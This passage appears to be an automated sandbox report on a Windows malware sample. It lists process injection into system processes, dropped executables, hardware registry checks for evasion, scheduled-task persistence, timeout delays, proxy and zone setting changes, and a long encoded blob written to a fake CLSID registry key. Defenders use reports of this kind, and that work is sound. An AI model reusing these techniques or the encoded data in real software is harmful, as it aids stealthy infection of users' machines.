PID 5100 set thread context of 756 N/A C:\ProgramData\889030.exe C:\ProgramData\889030.exe
PID 2808 set thread context of 5000 N/A c:\windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 780 set thread context of 5492 N/A C:\ProgramData\1860007.exe C:\ProgramData\1860007.exe
PID 6132 set thread context of 5724 N/A C:\Users\Admin\AppData\Local\Temp\is-FJS9H.tmp\postback.exe C:\Windows\SysWOW64\explorer.exe
PID 5352 set thread context of 1316 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Java\SPLXFNRHQQ\ultramediaburner.exe C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe N/A
File created C:\Program Files\Java\SPLXFNRHQQ\ultramediaburner.exe.config C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-E0AL7.tmp C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Roaming\services64.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\Vozhaelujeci.exe C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Roaming\services64.exe N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-N0R1G.tmp C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\FarLabUninstaller\is-S39RI.tmp C:\Users\Admin\AppData\Roaming\services64.exe N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\Vozhaelujeci.exe.config C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI3E62.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Installer\MSI3F7D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7FEB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Installer\MSI403A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA42E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB548.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB7E9.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7536d3.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Installer\MSI3A2B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC396.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3FEB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4089.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI40C9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAD19.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB15F.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\Installer\f7536d0.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6CBD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Installer\f7536d0.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6A0C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Installer\MSI78C5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB8F4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\Explorer.EXE N/A
File opened for modification C:\Windows\Installer\MSI7E44.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Installer\MSI7317.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBAD9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cheugba N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cheugba N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cheugba N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cheugba N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cheugba N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cheugba N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cheugba N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cheugba N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cheugba N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IIRT641V-ST1Y-V6LD-W3TL-UIUSI353MX63}\1 = c1d5783458c1e5483c50c1fd500477161717161fcb6fdcd85fb5020048c580b5be060048c598bcab02004863e141971440c5b1348d5eaf665ac5ca438f404bb06810b73f88cb6ae874814d3d85e3959f4ba30000b9e1fcf7b6adc363007e960000b9b224203f78c37b18618900004cc773b0cd68991424cffc7345f8bd04000083e740745041ca5d97f9b830300033fa36299ec37bb8cd45b448b1c6b7b9ce4d8ec5c9607418c35d9ec1cd600c64c1c24781c5680499bb020000ff2a5edf707418c34526f71d020033e193f9b880800048c3458fbe289fc3d7787c10c3e7484428c3ff504c20cb47f4711e1e1f019c8bc38f20e70f000084c1d5783c91c5682c5d03011fc5e1489df1c96d2cc00000652dc38f214560000033e81c82e2892e4444488f82eee74c4c4c48c3db4854c7d9425dc6c9727dc845cf8bfb7e0100492a237cb7408a4e1f521a15c69950c937bc8888000042c90f848c8c000089cc2a9cfc703af2327a8bbd81c3cef2ff8929f8544bb87f8dc04cbd5468c3deeaface52d6b1bcc308c48dba5b1d7f804221e3cb80b73d8bca68ea7492aac08134b370bacafa51694af3b17860416ef3c1cf9595589e4edb90c5fb72454eb1bd4ab63c020bc70ed3917963a48a9b63890e317e221379f238867a42616aa03bbbad0000becaca65a98133764ac3cfb8a31540cac255554acb439f85d84ad39972eade8d37b500008bce2a264ac28973ebdf8821a6000041f8972e00008b408f7c327e6f91884ec7483c3eceb17ea624cbcd018283cf4a4b8e15507bfbb49faec9cc408a70b74fc1834eb1be49b63f010ec20efbb97960a78a9b6558584a3e3d3d3ea722cdc50982834bb8fb19f2c123c04cbc9d6589494f02000066efd5118a4245b46b57c5c08a4c5bdfb1bfc00ac68db9581d7f804023e3db90b73e89cb69eb74925ef53ba1d1efa7b10100b7c5c08a382f5d8113f7a9bf010014ec4fc34929e931f388c317b8d4f0000048c94504c000005f01039e0f84cb6fc4c0fbed0100b7cb6be141cb47eceb0f0084c1d5782c5d030116151514141717161fcb6fdc78c372725163f53b5121ef0510020046e1fcf7b6adc1cd600cc03623020046b224203f78c36300392c0200463b811e97c2c10da0ac8800004cc76b085441020046f0bef57a34c77310475202004696008c52b9c10da0a4800000e875600200b7c1cd60046cc7636b78bb337434f329bc560300b8f5175a00665f3e737eb2bd0d0800665f3e7290ad2b144b74c503860901004873e2aba754bd026e154500747d88bd023c03010075b67bb820200066e3c17a2862c341b27a281476c40848f00000665f7d7a2a61d1e04bb8f37a384ac1b90a0dfa425a95c9dc504cc845b4566bc403961901008bca4507023af8cc88fe860000b64ad19acb42e96172ebac9bd4fa8dcfc772067d7ef1c58ddfa20000bbcfdf6a6a67e193be358f46d290ca4983b606b56ff9b4277af3bb4f71c0138e11010041ca804a78724349cac847454e480c433be1d1c28cc0d67369ccc4b6fccb434a80b606dae18e7fea904e4c898ecf5a98ca6be974be8f7f6f6a6e5f8a7f040100bef8f940000041f9b830300041ca59e1fa362a9dc35390cd45cf8b5f250100bbcfcf7a6a1cc35c9fc34389be289276fa884eb85e8f227f777238753a0cc8e4680eb8728dc5818cc1ca0f4ada1501008545b45667ce0f4ad619010045c045b46154ca1f5ad21d010048c5810f4b4bd496be289276faaf2742ee8b5d57523874b28cc7e7480498f5175a00665f3a777765ef8a4b2b184784e8154500484bf8c23e73768b8e8c0c37b000008545cf8b0a8e0000447db63bb400000f890781000048c599174fc7509767746fbb814ecfc9464542cbbc1f2afdbd01000041ca4b88cb6be0409939a42fb35545be4577c1c7424d4ab8b6b8b9f0f000414eb877a645e278b9a0a000665dfab4649a814bc0611ff00f004ac789074f4d1d1d48ca42c34f66ffa1b98976fa42c9464c4bd35b814ecfc9464542cbbdd6efc72f80ac8800008b0c179000008545cf8b1e9a000048c5b937888d8345cf8b088c00008bc54248cfe57e584bc88fcf7bbc4fe8a74ff00cab700c6d76fa85c76ba8cd45cf8bfc850200beca62a474377a330ec2458bce72b1c39a58c24784cd57ab7c0ab86539ec4fcb41c04a4bd02c6bb0a48000004576fa81cd45cf8bc4bd0200b4c28d2b67b73a89c776b48826e448c6813b7b75307ccaf7cb45d29f8d8345b5f4cdc72f80ac8800004cc7e7480464cf0c27a0000045c045b453ac0c23a400008545b469964380f01301000000000000e2bf16abc7810f4fc7488b892be942be2a9dc1d66f7576f34bf45760c340834bf8baccfd718a5d29285245b5685876f3f3e19ac3403428e4e193f9b880800048c3408abe2b3d4f5a0300744d8ec3d7785438cb47f4711e1e1f1f1c1c1d0301039e0f00005054cc0458eee806a01971cd0d083636101136db79e7700082e90de28107c7f93a0560e4d4a1f022022b0b020c0e00aca80400a4f056000923eb4383131207cb4e8281028405090c050002020bca44860340470700001b9a954c5a0260601516191a0407030f0a018281818e09181910283e0e0854550105252707e0214082c3c606145b4d0f0e0102303707101d0d00e0d084b10538300306082595bd0d05949d03cac404d036ea819fddccdb72aa2feee7e7ff7d87f5744c29200060a5c7fa5e07a127e7d414a262c1b1bb0192d8400080804349c2868ec1a1d07606003afac15392c176f78184850009c905c7c0faf8fa3a5a0a10448842c7cfd5f7e50d1c6bbb98d9dc810bdecb8c8e90d2e5b9f5fcdec89352c0945480fb7be09db3c74bc39ae4ff7f6f6f6f535358488d808420ad04e9f50cbdaf02cccc0048cb6fec28c0ef1d1b0133fac94576f3f3e19ac1845d49b7a806c0c01adac0e8b8dd941801404680c6464e58998cfa528d238047ec20e137720fa4cb00fff389a9e235b8ae27033df8c0c394d68b6268e2e12ccce033c5f62234f6e021e1c323e3c066ef8c9fbee4c0c320e8f3fb43157538183078c5e1480468c3830d23795f1122f68dc109c5458b8f209c18c033534863cba8c5d97004309b89bbbb6226b9ea8f8eaebe455b29735a938c6468293af2f8b0b951c3c64d80c87bfe25743ba5a2a39bfd754d591df2e0cd98a1f40938d9e8f85bac04898cb7b7e4eabb1bcb6aeeef37c6f1a9c499f41ecf635bf5a451e94be905aa06e8b8b8e3d71a604dfcf6da08f385e7991b15377f9de536e1e1fa36ea51d72675c8818c696c024a18d545b464b09cbcc04a4249c0fac455a802b9bc4540008068e5818c00cc5ff269c8c3a23cfd6d1da958ea3f398cc440d194454c7776c1895c782c40c1e548341048c1fd503c50c1f56c3404611776282868c58d051a415b0548c352c150c1880112164ab1ea1c2e07311217d58e0c03e1b2e641b4040433de2a844be0ec070380d1120b00c5f65b7810c1e23b306038b5cd357764ef222b805a3ce610d82b2843e0a7cf9e1abd89d0e149c1ceff504c5958e5549d8e2521361d2b2be0200bc12144277d62770848cb6def74b489c38364481c5834dfff50644048c3f7586c00c10a9190800b8a094bc18b488b60ef440dae21402160c744011032a002024041c6458684b1310101c74405e6625a185f1f202120275f19c8c0589bd77814302909611f54c921c376b6fe945192c383f111c48ca5f335c2757c05b722b82149c344273a580b93994c418059152289e696d16945483c9a8a883978df8fb17451d68f3c49a088c3eb396450148d5c40d5211dc80bc279cfea9a38d75b0fbfc06b215c7c204167ac7e718b103c248c9c56f91ab05fbff334c7f3d5c4f3ab7a33585830308ac01bd3493500ff1549efb704803b3a90a1ba0a744ecaf17987eaf3a77331e3f8937e05e7effcb4b1b5191b26978a75fc343190a030060716466a7b424cf7507f3335810a9184b5cb79e06248c2501f8720690283107362723092d19296e9ec74bc59974750efead275c07f45b7eabf172e935001422b795d5cb1e7f6bf17b7da8633910921dee41a4b6aa8391bae4dca7bb8cc0f615aa3666cf1228a0272b444b565bbaf958a6758243003cc7a738238c72be34b07109bb521105075253c74c35e992fa388488bc787ebc8d41b240a3931526f7a536d30c3dff473bb97eaeeab7d9518a585802b687fb5ca7f1c248483fbc3c58ccdf71876829480c06b4778a38c55682999c6217fbe88d106eabcb914941545b573969d4d1fdfa4a4ec484428c5c9604450b0c4600c64c18814313f0e2102766004c1963bc7446ef1676f6be19e3c47070105349120b5044c2f2f68344814c10ab61c974500f45b7a9ab303403139c5c27f7797e2c2c4a4c3acea08afb4723650b3b57452f28caef89981c6b6755b787418c5d27e416773501c86df4729105b0440f6e69bc8fb0dba040a81bd75c38080cc4f8189414940c3888ae1701953521c54c3985bc3c40aa5c8c68e5d75c5d698f4f3c4482b346f7cc9cb76b332b05143c48fa7ea607403ba33c41fa0e353c5c6406a5b339e5fc75440232f8f800218cc41b61c93bf0211515cede10315f5e362017316e1e723c1e24f7c1eb3d27f35d48801aad07ad88242db7e7084124badf9402f244f682828eb80e36ab0a28da8bfe240ed76c592705014532bc8f3056e487beaa2235267eaeac75113a2b2d45036f22bbaa1e2f2880e69105bf4fbb4eee7e7693ccdf9711372601406d2f2b6c317541701724fed044166cb2bac2c8e7b2448d88a02294b6a91de1146386f7f7db5968fa140131b5c976fcc32cb09d941c5c1086004722f82ea897cf491d590cf8b01d57ca7bb101d7d80c30300753731464ad909dc46272d15846cc230f4ef697aecc97eb359ca432b7f0e89834ad5ff06a68551c686bb360984704583b4f9ea10544aaad066f8eae7b24549441f544b28a5fe840000bf17d44704900b98404b377f8c8c8001828f40c75795c0e27398c9c0fa53771615c6f16ad9e08c98a59f2df389c28ff5b889a3e87bbcc769e248c362608e3e380e0b801db92d45cd7af08b8692108041c8ca6b906bd34d2f7251b611afc0895b5345c4f26b55c88d7874cd2bec4247f9a813b1a6748261869f992e395648c3ce757cc740c40fb7fa656dce4d8ec18944601c71c25f9cc5ebe276f4f7f130f7c63233b1f5d500fd93aa45607f189c78f210c1ce12858e75605ac1971eebe142c3402354231b8602f1953878442cdcae6c3a69344538a8d44c285e4e60611f1f1d03a4a6a2da5d994ca9a63a9a12e2b87e7445510301b76742b07df059a8388dac54ffdbcb6ac0724d7f0c004c17d6e10fe08bc9cfb98b67775fb9cea8a6470f094fc1312b8090539abab675ff2453257fee396a3c24a7deb62b9aba8c0bc063e43ccdb436f32ae3c5cc65254840cd4cbd79cfdc5739fb5a38e35a46243d8d804a8849c5682c5b0694948599d5051148c18199888122e744eabf789805204dc5ed0428b8b91b0241227b04fca454b4c5b2b30b3b0f8b4507e62b2028c3437bf20589186ebc3c34440fb9f3354a3b0e8a876b89e04577dfa5c34af174cc2488461173090d4c68a343c289bbf0f808b595e6f98bee5b32807af940357137f32beeb4b5c5e11bfdc98dd133618ad803405576d7c6294f34783ca4abeba25f0c2c256c246202446fea857ffbb37b1851ca4b852570043ffbd08b73bccf498ac599041fe7884131506952732864cff863ad7cd0557f3bf5873e00c7b076c881fb8bb5c2426aecfcfed563758d6378933770cf9bd58dc5017ef